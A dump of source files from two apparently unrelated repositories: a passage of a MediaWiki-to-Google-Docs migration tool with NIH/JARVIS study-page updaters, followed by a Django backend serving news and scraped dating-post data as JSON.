chunked_relevant_folders = \\\n [relevant_folders[i:i + MAX_PARENTS] \\\n for i in range(0, len(relevant_folders), MAX_PARENTS)]\n for folder_list in chunked_relevant_folders:\n query_term = ' in parents or '.join('\"{0}\"'.format(f) for f in folder_list) + ' in parents'\n relevant_files.update(self.get_all_files_in_folders(query_term))\n return relevant_files\n\n\n def get_all_files_in_folders(self, parent_folders):\n \"\"\"\n Return a dictionary of file IDs mapped to file names for the specified parent folders.\n \"\"\"\n files_under_folder = {}\n page_token = None\n max_allowed_page_size = 1000\n just_files = f\"mimeType != 'application/vnd.google-apps.folder' and trashed = false and ({parent_folders})\"\n while True:\n results = self.drive.files().list(\n pageSize=max_allowed_page_size,\n fields=\"nextPageToken, files(id, name, mimeType, parents)\",\n includeItemsFromAllDrives=True, supportsAllDrives=True,\n corpora='drive',\n driveId=self.drive_id,\n pageToken=page_token,\n q=just_files).execute()\n files = results.get('files', [])\n page_token = results.get('nextPageToken', None)\n for file in files:\n files_under_folder[file['id']] = file['name']\n if page_token is None:\n break\n return files_under_folder\n\n\n def all_folders_in_drive(self):\n \"\"\"\n Return a dictionary of all the folder IDs in a drive mapped to their \n parent folder IDs (or to the drive itself if a top-level folder).\n This flattens the entire folder structure.\n\n Note that this caches the result, because for our purposes the\n folders will not be changing often enough to matter.\n \"\"\"\n if len(self.folders) > 0:\n return self.folders\n\n page_token = None\n max_allowed_page_size = 1000\n just_folders = \"trashed = false and mimeType = 'application/vnd.google-apps.folder'\"\n while True:\n results = self.drive.files().list(\n pageSize=max_allowed_page_size,\n fields=\"nextPageToken, files(id, name, mimeType, parents)\",\n includeItemsFromAllDrives=True, supportsAllDrives=True,\n corpora='drive',\n driveId=self.drive_id,\n pageToken=page_token,\n q=just_folders).execute()\n result_folders = results.get('files', [])\n page_token = results.get('nextPageToken', None)\n for folder in result_folders:\n self.folders[folder['id']] = folder['parents'][0]\n if page_token is None:\n break\n\n return self.folders\n\n\n def folders_in_folder(self, folder_to_search):\n \"\"\"\n Yield subfolders of the folder-to-search, and then subsubfolders etc.\n Must be called by an iterator.\n \"\"\"\n # Get all subfolders\n temp_list = [k for k, v in self.all_folders_in_drive().items() if v == folder_to_search]\n for sub_folder in temp_list:\n yield sub_folder\n # Recurse\n yield from self.folders_in_folder(sub_folder)\n\n\n def load_common_folders(self):\n self.category_to_folder = {\n 'Study': 'Studies',\n 'Self Report Measure': 'Self Report Library',\n 'Behavioral Task': 'Behavioral Tasks',\n 'Behavioral Task Variant': 'Behavioral Tasks',\n 'Imaging Task': 'Imaging Tasks',\n 'Demo Task': 'Demo Tasks',\n 'Filmable Task': 'Filmable Tasks',\n 'BIOPAC': 'BIOPAC',\n 'Policies and Procedures': 'Policies and Procedures',\n 'CHM Community Meeting': 'Community Meetings',\n 'CHM Human Resources': 'HR',\n 'CHM Research Support Core': 'RSC',\n 'CHM Computing Guides': 'Computing',\n 'Computing': 'Computing',\n 'Kennedy': 'Kennedy',\n 'Keystone': 'Keystone',\n 'Brogden': 'Brogden',\n }\n\n self.namespace_to_folder = {\n 'User': 'People',\n }\n\n self.folders = {}\n for category, name in self.category_to_folder.items():\n self.folders[category] = self.find_folder(name)\n\n for namespace, name in self.namespace_to_folder.items():\n self.folders[namespace] = self.find_folder(name)\n\n\n def convert_one(self, title):\n page = self.wiki.pages[title]\n self.convert(page)\n\n def convert_category(self, category_name):\n category = self.wiki.categories[category_name]\n for page in category:\n self.convert(page)\n\n def convert_all(self, only_if_new=False, older_than=None):\n for page in self.wiki.pages:\n did_stuff = self.convert(page, only_if_new=only_if_new, older_than=older_than)\n\n if did_stuff:\n # Hitting some Google api limits, so let's sleep a bit here\n time.sleep(10.0)\n\n def convert_all_new(self):\n self.convert_all(only_if_new=True)\n\n\n def initialize_google_services(self):\n \"\"\"\n Boilerplate to cache a token and connect to the docs and drive services.\n \"\"\"\n\n creds = None\n token_file = 'auth.google_token.json'\n cred_file = 'auth.google_credentials.json'\n\n if os.path.exists(token_file):\n creds = Credentials.from_authorized_user_file(token_file, SCOPES)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(cred_file, SCOPES)\n creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n with open(token_file, 'w') as token:\n token.write(creds.to_json())\n\n self.docs = build('docs', 'v1', credentials=creds)\n self.drive = build('drive', 'v3', credentials=creds)\n\n\n def find_folder(self, name):\n \"\"\"\n Find folder across all drives by name.\n\n NOTE: Not super reliable if folder names are not unique.\n\n In the future it might be good to take an optional folder id,\n and query the document's folder chain to see if it is inside that\n folder id somewhere.\n \"\"\"\n\n result = self.drive.files().list(q = f\"mimeType = 'application/vnd.google-apps.folder' and name = '{name}'\",\n driveId=self.drive_id, corpora=\"drive\",\n includeItemsFromAllDrives=True,\n supportsAllDrives=True,\n pageSize=10, fields=\"nextPageToken, files(id, name)\").execute()\n folder_id_result = result.get('files', [])\n # If this fails, we couldn't find a folder named `name`\n actual_id = folder_id_result[0].get('id')\n logging.info(f\"Found folder named {name} with {actual_id}\")\n return actual_id\n\n\n def reparent(self, doc_id, folder_id):\n \"\"\"\n Reparent document to a specific folder using the drive API.\n \"\"\"\n\n f = self.drive.files().get(fileId=doc_id,\n fields='parents',\n supportsAllDrives=True).execute()\n previous_parents = \",\".join(f.get('parents'))\n if not folder_id in previous_parents:\n result = self.drive.files().update(\n fileId=doc_id,\n addParents=folder_id,\n removeParents=previous_parents,\n fields='id, parents',\n supportsAllDrives=True,\n ).execute()\n\n\n def add_tag(self, doc_id, tag):\n \"\"\"\n Store tag in document properties if it's not already there\n \"\"\"\n\n if \" \" in tag:\n raise ValueError(f\"Google drive properties can't have spaces, can't add tag '{tag}'\")\n result = self.drive.files().get(fileId=doc_id,\n fields='properties',\n supportsAllDrives=True).execute()\n\n if 'properties' in result:\n props = result['properties']\n else:\n props = {}\n\n tag_with_prefix = f\"tags/{tag}\"\n if not tag_with_prefix in props:\n logging.info(f\"Adding tag {tag} to {doc_id}\")\n # Yes, the weird way gdocwiki stores these as is a prefixed key \n # and a blank value\n props[tag_with_prefix] = ''\n self.drive.files().update(\n fileId=doc_id,\n fields='id, properties',\n body={'properties': props},\n supportsAllDrives=True,\n ).execute()\n\n\n def get_document(self, doc_id):\n return self.docs.documents().get(documentId=doc_id).execute()\n\n def get_document_modified_date(self, doc_id):\n f = self.drive.files().get(fileId=doc_id,\n fields='modifiedTime',\n supportsAllDrives=True).execute()\n return parser.parse(f['modifiedTime'])\n\n\n def batch_update(self, doc_id, requests, debug=False):\n \"\"\"\n Batch update the document with the given requests.\n\n If debug is passed, do each request one at a time, slow-ish.\n \"\"\"\n \n if debug:\n for r in requests:\n try:\n self.docs.documents().batchUpdate(\n documentId=doc_id, body={'requests': [r]}).execute()\n except BaseException as e:\n print(f\"Unexpected {e}, {type(e)} with request {r}\")\n raise\n time.sleep(0.1)\n\n else:\n return self.docs.documents().batchUpdate(\n documentId=doc_id, body={'requests': requests}).execute()\n\n\n def traverse(self, f, d, start_index, end_index):\n \"\"\"\n Recursive method to do a common thing we'll be needing a lot:\n store current start_index and end_index, while traversing\n the document tree and calling a function `f` on each dict.\n \"\"\"\n if 'startIndex' in d:\n start_index = d['startIndex']\n\n if 'endIndex' in d:\n end_index = d['endIndex']\n\n f(d, start_index, end_index)\n\n for key, value in d.items():\n if isinstance(value, dict):\n self.traverse(f, value, start_index, end_index)\n elif isinstance(value, list):\n for item in value:\n if isinstance(item, dict):\n self.traverse(f, item, start_index, end_index)\n\n\n def convert(self, page, only_if_new=False, older_than=None, debug=False):\n if page.name in self.mappings.title_to_id:\n if only_if_new:\n return False\n doc_id = self.mappings.title_to_id[page.name]\n if older_than:\n # someday, load up MediaWiki modify date and Google Doc modify date and compare them\n # NOTE: I have no idea what timezone the wiki timestamps actually are \n # wiki_date = datetime.fromtimestamp(time.mktime(page.touched), tzinfo=pytz.timezone('US/Central'))\n # For now, just compare doc_date with the command line\n doc_date = self.get_document_modified_date(doc_id)\n # Parse the command line param and hack in a timezone\n older_date = parser.parse(older_than).replace(tzinfo=pytz.timezone('US/Central'))\n if doc_date > older_date:\n return False\n\n document = self.get_document(doc_id)\n\n logging.info(f\"Converting {page.name} into existing doc {doc_id}\")\n else:\n full_title = page.name\n namespace = None\n if \":\" in full_title:\n namespace, title = full_title.split(\":\", 1)\n else:\n title = full_title\n\n # Create doc fresh\n doc_content = { \n 'title': title,\n }\n document = self.docs.documents().create(body=doc_content).execute()\n doc_id = document['documentId']\n\n self.mappings.add(full_title, doc_id)\n\n # Now we move the file into a folder, based on category\n # Default to the unsorted folder\n folder_id = self.unsorted_folder_id\n\n # But if there is a namespace or mapping to a specific folder, use it\n if namespace:\n for n in self.namespace_to_folder.keys():\n if n == namespace:\n folder_id = self.folders[n]\n break\n else:\n # Note that we just pick the first possible mapping, so order in category_to_folder is important\n page_categories = [c.name.replace('Category:', '') for c in page.categories()]\n for c in self.category_to_folder.keys():\n if c in page_categories:\n folder_id = self.folders[c]\n break\n self.reparent(doc_id, folder_id)\n logging.info(f\"Converting {page.name} into new doc {doc_id} in folder {folder_id}\")\n\n c = GDocConverter(\n self,\n self.wiki,\n self.wiki_prefix,\n self.docs,\n self.mappings,\n self.file_prefix,\n self.http_prefix)\n c.convert(page, doc_id, debug=debug)\n return True\n\n\ndef export_mediawiki(wiki, wiki_prefix, force, older, file_prefix, http_prefix, drive_id, unsorted_folder_id, page_title=None):\n x = GDocDriver(MAPPINGS_FILE, drive_id)\n x.run_export(wiki, wiki_prefix, force, older, file_prefix, http_prefix, unsorted_folder_id, page_title)\n\n\n\ndef link_folder(wiki, file_prefix, drive_id, files_folder_id, folder_id):\n x = GDocDriver(MAPPINGS_FILE, drive_id)\n # Clear out link mappings because we're walkin' em all\n x.mappings.ids_that_link_to_id = {}\n x.run_check_links(wiki, file_prefix, files_folder_id, folder_id)\n x.mappings.save()\n\ndef link_doc(wiki, file_prefix, drive_id, files_folder_id, doc_id):\n x = GDocDriver(MAPPINGS_FILE, drive_id)\n # Check just a specific doc\n linker = GDocLinks(wiki, x, file_prefix, files_folder_id)\n linker.check_links(doc_id)\n x.mappings.save()\n"
},
{
"alpha_fraction": 0.6225930452346802,
"alphanum_fraction": 0.6225930452346802,
"avg_line_length": 26.785715103149414,
"blob_id": "f4da0f7c1da6e76000c0be8fda60815eeadb1321",
"content_id": "68d8b2b77291a22cecfbce8609c3526b7648c739",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 779,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 28,
"path": "/medialinks.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import mwclient\nimport mwparserfromhell\nimport logging\nimport re\nimport sys\n\ndef fix(page):\n text = page.text()\n p = mwparserfromhell.parse(text)\n has_bad_link = False\n for link in p.filter_wikilinks():\n if \"File:\" in link.title:\n print(\"Fixing link\", link.title, \"in\", page.name)\n has_bad_link = True\n link.title = re.sub(\"^:?File:\", \"Media:\", str(link.title))\n\n if has_bad_link:\n page.save(str(p), \"Automated edit to make File: links into direct Media: links\")\n\ndef run_categories(mother, categories):\n for category in categories:\n for page in mother.categories[category]:\n fix(page)\n\ndef run_pages(mother, pages):\n for title in pages:\n page = mother.pages[title]\n fix(page)\n\n"
},
{
"alpha_fraction": 0.5403472781181335,
"alphanum_fraction": 0.5464760065078735,
"avg_line_length": 24.736841201782227,
"blob_id": "1fb2ce24e8ddcc057f67b376ca02b4289b232d02",
"content_id": "7c36972d28c33c4d746152b7ee2049079371140a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 979,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 38,
"path": "/auth_store.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import pickle\nimport getpass\nimport os\nimport os.path\nimport stat\n\n\ndef get_auth():\n fname = 'auth.pickle'\n if os.path.exists(fname):\n auth = pickle.load( open( fname, \"rb\" ) )\n else:\n # Define file params\n flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL # Refer to \"man 2 open\".\n mode = stat.S_IRUSR | stat.S_IWUSR # This is 0o600 in octal\n \n # For security, remove file with potentially elevated mode\n try:\n os.remove(fname)\n except OSError:\n pass\n \n # Open file descriptor\n umask_original = os.umask(0)\n try:\n fdesc = os.open(fname, flags, mode)\n finally:\n os.umask(umask_original)\n \n user = input(\"Username: \")\n password = getpass.getpass()\n auth=(user, password)\n\n # Open file handle and write to file\n with os.fdopen(fdesc, 'wb') as fout:\n pickle.dump(auth, fout)\n\n return auth\n\n"
},
{
"alpha_fraction": 0.5455012917518616,
"alphanum_fraction": 0.5470436811447144,
"avg_line_length": 45.30952453613281,
"blob_id": "2f70e1530b73cfcf95bd2ffc27866527019bf91a",
"content_id": "b934b9c6a36a7dc419b1e45ec97f4f7ae923c4af",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3890,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 84,
"path": "/study.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import mwclient\nimport mwparserfromhell\nimport logging\nimport requests\nimport dateutil.parser\nimport traceback\nfrom jarvis import Jarvis\nfrom utilities import study_template\n\ndef jsondate_to_str(j):\n return str(dateutil.parser.parse(j).date())\n\ndef run(mother):\n category = mother.categories['Study']\n for page in category:\n oldtext = page.text()\n p = mwparserfromhell.parse(oldtext)\n template = study_template(p)\n if template:\n logging.debug(\"Page {} has template {} with these params: {}\".format(\n page.name, template.name.rstrip(), template.params))\n\n try:\n jarvis_id = template.get(\"JARVIS ID\").value.rstrip()\n except ValueError:\n # Skip JARVIS integration if there's no id\n logging.warning(\"No JARVIS ID on study page %s\" % page.name)\n pass\n else:\n try:\n # Pull stuff out of JARVIS and put it into the template params\n j = Jarvis()\n\n logging.info(\"JARVIS id for %s is %s\" % (page.name, jarvis_id))\n irb_exp = j.irb_expirations(jarvis_id)\n if irb_exp:\n template.add(\"JARVIS IRB Expiration\", irb_exp)\n quota = j.total_active_quota(jarvis_id)\n if quota:\n template.add(\"JARVIS Study Drive Quota\", quota)\n \n # Personnel is a different section of the document, so replace that\n personnel = j.personnel(jarvis_id)\n old_sections = p.get_sections(matches = \"JARVIS Personnel\")\n if len(old_sections) > 0:\n old_personnel = old_sections[0]\n p.replace(old_personnel, personnel)\n\n except Exception as e:\n # Print the error and keep going\n logging.error(f\"Problem fetching from JARVIS on study page {page.name}: {traceback.print_exc()}\")\n pass\n\n try:\n nih_id = template.get(\"NIH RePORTER ID\").value.rstrip()\n except ValueError:\n # We just skip NIH integration if there's no id or we fail in any way\n logging.warning(\"No NIH ID on study page %s\" % page.name)\n pass\n else:\n # award date, NIH start / end dates, break out official NIH title\n logging.info(\"NIH id for %s is %s\" % (page.name, nih_id))\n nih_url = \"https://api.federalreporter.nih.gov/v1/Projects?nihApplId=\" + nih_id\n resp = requests.get(nih_url)\n\n if resp.status_code != 200:\n logging.warning(\"GET {} {}\".format(nih_url, resp.status_code))\n else:\n data = resp.json()\n template.add(\"NIH Title\", data['title'])\n template.add(\"NIH Fiscal Year\", data['fy'])\n template.add(\"NIH Budget Start Date\", jsondate_to_str(data['budgetStartDate']))\n template.add(\"NIH Budget End Date\", jsondate_to_str(data['budgetEndDate']))\n template.add(\"NIH Project Start Date\", jsondate_to_str(data['projectStartDate']))\n template.add(\"NIH Project End Date\", jsondate_to_str(data['projectEndDate']))\n\n newtext = str(p)\n newtext = newtext.replace(\"<noinclude>NOTE: This is prefab content inserted in new study pages</noinclude>\", \"\")\n\n if oldtext.strip() != newtext.strip():\n logging.warning(\"Updating study page %s, change detected\", page.name)\n page.save(newtext, \"Automated edit to update study values from JARVIS and NIH\")\n else:\n logging.info(\"Not updating study page %s, text identical\", page.name)\n"
}
] | 22 |
Ghstart/gsite_python_web
|
https://github.com/Ghstart/gsite_python_web
|
b469a7f19f23d85ec9ea48812bf635b08aaf5a2e
|
9da8e5de3f91c8074894b7f3ac1cbac030b9e82c
|
c70d504a7876c7c9ae1b7c294604dc0b48408fc4
|
refs/heads/master
| 2021-01-23T01:51:07.444572 | 2017-06-15T11:07:47 | 2017-06-15T11:07:47 | 94,430,518 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.801075279712677,
"alphanum_fraction": 0.801075279712677,
"avg_line_length": 19.77777862548828,
"blob_id": "6d44875a9fa0122ef9c9de8d2a0669687bd653de",
"content_id": "e13b949a0d4ec1f667bdbedbf952708246c65547",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 186,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 9,
"path": "/apps/users/admin.py",
"repo_name": "Ghstart/gsite_python_web",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\n# Register your models here.\nfrom .models import UserInfo\n\nclass UserInfoAdmin(admin.ModelAdmin):\n pass\n\nadmin.site.register(UserInfo, UserInfoAdmin)"
},
{
"alpha_fraction": 0.7349397540092468,
"alphanum_fraction": 0.7349397540092468,
"avg_line_length": 15.600000381469727,
"blob_id": "d324b54e8730f55ec8fb1258974e9f1fd25a27e6",
"content_id": "da5e2310702680e39732561850ea7e1ca14d1320",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 83,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 5,
"path": "/apps/gApi/apps.py",
"repo_name": "Ghstart/gsite_python_web",
"src_encoding": "UTF-8",
"text": "from django.apps import AppConfig\n\n\nclass GapiConfig(AppConfig):\n name = 'gApi'\n"
},
{
"alpha_fraction": 0.7246695756912231,
"alphanum_fraction": 0.7246695756912231,
"avg_line_length": 37.91428756713867,
"blob_id": "90d923115157b1c1739e5ca5e5615459ecd2c1ea",
"content_id": "745e8fa62f9d99c6832f059cd7c596fecfdf57ff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1386,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 35,
"path": "/apps/gApi/admin.py",
"repo_name": "Ghstart/gsite_python_web",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom django.utils.html import format_html\n\n# Register your models here.\nfrom .models import News, jobbole_date, jobbole_detail_data, jobbole_image_data\n\nclass NewsAdmin(admin.ModelAdmin):\n pass\n\nclass jobbole_dateAdmin(admin.ModelAdmin):\n list_display = ('custom_description', 'show_detail_info_url', 'publish_time', 'location', 'fav_num')\n\n def show_detail_info_url(self, obj):\n return format_html(\"<a href='{url}' target='_blank'>{url}</a>\", url=obj.detail_info_url)\n show_detail_info_url.short_description = \"详情链接\"\n\nclass jobbole_detail_dataAdmin(admin.ModelAdmin):\n list_display = ('show_detail_description_content',)\n\n def show_detail_description_content(self, obj):\n return format_html(\"<pre>{url}</pre>\", url=obj.detail_description_content)\n show_detail_description_content.short_description = \"自我介绍\"\n\n\nclass jobbole_image_dataAdmin(admin.ModelAdmin):\n list_display = ('show_image_url',)\n\n def show_image_url(self, obj):\n return format_html(\"<a href='{url}' target='_blank'>{url}</a>\", url=obj.image_url)\n show_image_url.short_description = \"自拍链接\"\n\nadmin.site.register(News, NewsAdmin)\nadmin.site.register(jobbole_date, jobbole_dateAdmin)\nadmin.site.register(jobbole_detail_data, jobbole_detail_dataAdmin)\nadmin.site.register(jobbole_image_data, jobbole_image_dataAdmin)\n"
},
{
"alpha_fraction": 0.6142424941062927,
"alphanum_fraction": 0.6180918216705322,
"avg_line_length": 38.543479919433594,
"blob_id": "2be1620d5f0dad6e78e116202981e7ddeb5b03c5",
"content_id": "0b02200b0a5eb31ccf4188639308d89773f7f7d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3653,
"license_type": "no_license",
"max_line_length": 150,
"num_lines": 92,
"path": "/apps/gApi/views.py",
"repo_name": "Ghstart/gsite_python_web",
"src_encoding": "UTF-8",
"text": "# -*- encoding:utf-8 -*-\nfrom django.http import HttpResponse\n\nimport json\nfrom .models import News, jobbole_date, jobbole_image_data, jobbole_detail_data\nfrom gsite import settings\nfrom django.views.generic.base import View\nimport leancloud\nimport logging\n\n# Create your views here.\ndef index(request):\n NewsObject = News.objects.all()\n response_data = {}\n if NewsObject is None:\n response_data['result'] = 'error'\n response_data['success'] = False\n response_data['message'] = 'No datas'\n else:\n collect_datas = []\n for data in NewsObject:\n\n result_data = {}\n result_data['title'] = data.title\n result_data['summary'] = data.summary\n result_data['thumbnail']= settings.IMAGE_ROOT + data.thumbnail.url\n result_data['add_time'] = data.add_time.strftime(\"%Y-%m-%d %H:%M\")\n\n # 发布者的相关信息\n pub_userInfo = {}\n pub_userInfo[\"nick_name\"] = data.userinfo.nick_name\n pub_userInfo[\"avatar\"] = settings.IMAGE_ROOT + data.userinfo.avatar.url\n if pub_userInfo is not None:\n result_data[\"pub_userInfo\"] = pub_userInfo\n\n if result_data is not None:\n collect_datas.append(result_data)\n\n response_data['result'] = collect_datas\n response_data['success'] = True\n response_data['message'] = 'success to get datas'\n\n return HttpResponse(json.dumps(response_data), content_type='application/json')\n\ndef job(request, page):\n # leancloud.init(\"xx\", \"xx\")\n # logging.basicConfig(level=logging.DEBUG)\n # pageIndex = int(page)\n # if pageIndex * 50 > jobbole_date.objects.count() or pageIndex == 1 or pageIndex < 0:\n Jobs = jobbole_date.objects.all()[:50]\n # else:\n # Jobs = jobbole_date.objects.all()[50*(pageIndex - 1):50 * pageIndex]\n # Jobs = jobbole_date.objects.all()\n\n results = {}\n datas = []\n for job in Jobs:\n\n # Jobbole_Date_Object = leancloud.Object.extend('Jobbole_Date_Object')\n # jobbole_object = Jobbole_Date_Object()\n #\n # jobbole_object.set('custom_description', job.custom_description)\n # jobbole_object.set('publish_time', job.publish_time)\n # jobbole_object.set('location', job.location)\n # jobbole_object.set('fav_num', job.fav_num)\n\n temp_dic = {}\n temp_dic['custom_description'] = job.custom_description\n temp_dic['publish_time'] = job.publish_time\n temp_dic['location'] = job.location\n temp_dic['fav_num'] = job.fav_num\n\n detail_info_url_object_id = job.detail_info_url_object_id\n if detail_info_url_object_id:\n images = jobbole_image_data.objects.filter(detail_info_url_object_id=detail_info_url_object_id).values('image_url')\n temp_image_collection = []\n for image_object in images:\n temp_image_collection.append(image_object['image_url'])\n temp_dic['images'] = temp_image_collection\n # jobbole_object.set('images', temp_image_collection)\n\n detail_info = jobbole_detail_data.objects.filter(detail_info_url_object_id=detail_info_url_object_id).values('detail_description_content')\n temp_dic['detail_info'] = detail_info[0]['detail_description_content']\n # jobbole_object.set('detail_info', detail_info[0]['detail_description_content'])\n\n datas.append(temp_dic)\n # jobbole_object.save()\n\n results['list'] = datas\n results['result'] = \"SUCCESS\"\n\n return HttpResponse(json.dumps(results), content_type='application/json')"
},
{
"alpha_fraction": 0.6654819846153259,
"alphanum_fraction": 0.6801421642303467,
"avg_line_length": 36.53333282470703,
"blob_id": "95a42cc6b068615cdce2680eb65f9889aa961071",
"content_id": "33f2336df6534c78c44d8eadf5e409022cad0ef9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2427,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 60,
"path": "/apps/gApi/models.py",
"repo_name": "Ghstart/gsite_python_web",
"src_encoding": "UTF-8",
"text": "# -*- encoding:utf-8 -*-\nfrom django.db import models\nfrom datetime import datetime\n\nfrom users.models import UserInfo\n\n# Create your models here.\nclass News(models.Model):\n userinfo = models.ForeignKey(UserInfo, verbose_name=u\"用户\")\n title = models.CharField(max_length=200, verbose_name=u\"标题\")\n summary = models.TextField(verbose_name=u\"摘要\")\n thumbnail = models.ImageField(upload_to=\"thumbnail/%Y/%m\", verbose_name=u\"缩略图\", max_length=100)\n add_time = models.DateTimeField(default=datetime.now, verbose_name=u\"添加时间\")\n\n class Meta:\n verbose_name = u\"新闻\"\n verbose_name_plural = verbose_name\n\n def __unicode__(self):\n return self.title\n\nclass jobbole_date(models.Model):\n custom_description = models.CharField(max_length=200, verbose_name=u\"自我描述\")\n detail_info_url = models.URLField(max_length=300, verbose_name=u\"详情链接\")\n detail_info_url_object_id = models.CharField(max_length=50, verbose_name=u\"链接的加密\")\n publish_time = models.CharField(max_length=45, verbose_name=u\"发布时间\")\n location = models.CharField(max_length=45, verbose_name=u\"发布地址\")\n fav_num = models.IntegerField(default=0, verbose_name=u\"喜欢数\")\n\n class Meta:\n verbose_name = u\"相亲信息\"\n verbose_name_plural = verbose_name\n\n def __unicode__(self):\n return self.custom_description\n\nclass jobbole_detail_data(models.Model):\n detail_description_content = models.TextField(verbose_name=u\"详细的自我描述\")\n detail_info_url = models.URLField(max_length=300, verbose_name=u\"详情链接\")\n detail_info_url_object_id = models.CharField(max_length=50, verbose_name=u\"链接的加密\")\n\n class Meta:\n verbose_name = u\"相亲详细信息\"\n verbose_name_plural = verbose_name\n\n def __unicode__(self):\n return self.detail_description_content\n\n\nclass jobbole_image_data(models.Model):\n detail_info_url = models.URLField(max_length=300, verbose_name=u\"详情链接\")\n detail_info_url_object_id = models.CharField(max_length=50, verbose_name=u\"链接的加密\")\n image_url = models.CharField(max_length=300, verbose_name=u\"妹子发的单张图片\")\n\n class Meta:\n verbose_name = u\"相亲图片信息\"\n verbose_name_plural = verbose_name\n\n def __unicode__(self):\n return self.detail_info_url"
},
{
"alpha_fraction": 0.4542253613471985,
"alphanum_fraction": 0.49295774102211,
"avg_line_length": 24.909090042114258,
"blob_id": "5a3c04884a5317094b648b21f11fb847ec699d57",
"content_id": "58371373eb67c866851eaeae46cd98f8c4bfd798",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 288,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 11,
"path": "/apps/gApi/urls.py",
"repo_name": "Ghstart/gsite_python_web",
"src_encoding": "UTF-8",
"text": "# -*- encoding:utf-8 -*-\n__author__ = 'Gh'\n__date__ = '2017/5/25 下午4:39'\n\nfrom django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^job/(?P<page>\\d+)$', views.job, name='job'),\n ]"
},
{
"alpha_fraction": 0.5635104179382324,
"alphanum_fraction": 0.6120092272758484,
"avg_line_length": 21.789474487304688,
"blob_id": "62612cc51e94f035c807c0e991ca74f239d208d1",
"content_id": "8fef6c9f2887a2514c41859aa1fdbf263a7819c2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 433,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 19,
"path": "/apps/gApi/migrations/0006_remove_jobbole_detail_data_images_url_datas.py",
"repo_name": "Ghstart/gsite_python_web",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.1 on 2017-06-09 16:49\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('gApi', '0005_jobbole_detail_data_jobbole_image_data'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='jobbole_detail_data',\n name='images_url_datas',\n ),\n ]\n"
},
{
"alpha_fraction": 0.6858513355255127,
"alphanum_fraction": 0.7553957104682922,
"avg_line_length": 26.66666603088379,
"blob_id": "e5625dac9fdf88a1f6664ab68f66e4beeaa8de72",
"content_id": "5b03880aaabbfcb90da880ed5427264248fc8665",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 585,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 15,
"path": "/README.md",
"repo_name": "Ghstart/gsite_python_web",
"src_encoding": "UTF-8",
"text": "# gsite_python_web\n1. 这是我用Django搭建的后台系统,主要负责是给Android和iOS平台来调用接口。\n\n2. 后台系统是用用Django自带的Admin。\n\n3. 环境为Python 3.5.1, Django 版本为 1.11.1\n\n4. 一部分数据可以自己编辑,一部分数据可以通过Scrapy 来爬去,目前已经爬去的网站:\n\n> http://date.jobbole.com/ (伯乐在线)\n\n\n---\n\n---\n\n\n"
},
{
"alpha_fraction": 0.531438410282135,
"alphanum_fraction": 0.5607235431671143,
"avg_line_length": 36.45161437988281,
"blob_id": "1b3daa6b387c6bd7239f47381bc0200fe95be701",
"content_id": "6ef3ede79b4d086b998e82f07e1b900572ecfc66",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1215,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 31,
"path": "/apps/gApi/migrations/0003_jobbole_date.py",
"repo_name": "Ghstart/gsite_python_web",
"src_encoding": "UTF-8",
